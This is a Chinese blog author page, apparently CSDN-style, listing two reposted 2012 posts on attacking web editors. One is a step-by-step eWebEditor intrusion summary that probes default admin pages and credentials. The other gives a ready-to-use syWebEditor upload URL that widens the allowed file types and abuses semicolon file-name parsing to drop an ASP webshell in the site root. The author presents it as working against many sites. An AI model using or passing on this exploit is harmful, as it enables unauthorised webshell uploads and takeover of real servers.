ewebeditor
fengling132
这个作者很懒,什么都没留下…
展开
-
ewebeditor漏洞利用总结
ewebeditor漏洞利用总结 先从最基本的记录起!通常入侵ewebeditor编辑器的步骤如下: 1、首先访问默认管理页看是否存在。 默认管理页地址2.80以前为 ewebeditor/admin_login.asp 以后版本为admin/login.asp (各种语言的大家自己改后缀,本文就以asp来进行说明,下面不再细说了!) 2、默认管理帐号密码!转载 2012-03-16 16:22:38 · 1182 阅读 · 0 评论 -
syWebEditor的一个通杀漏洞
直接访问 /syWebEditor/UpImg.asp?isBack=&fileType=gif|jpg|png|asa|asp|mdb|&obj=L_Img&UpPath=/a.asp; 上传a.jpg后,shell在根目录下,名为a.asp;a.jpg 试了几个,都能成功,应该是通杀的...转载 2012-04-20 21:55:31 · 514 阅读 · 0 评论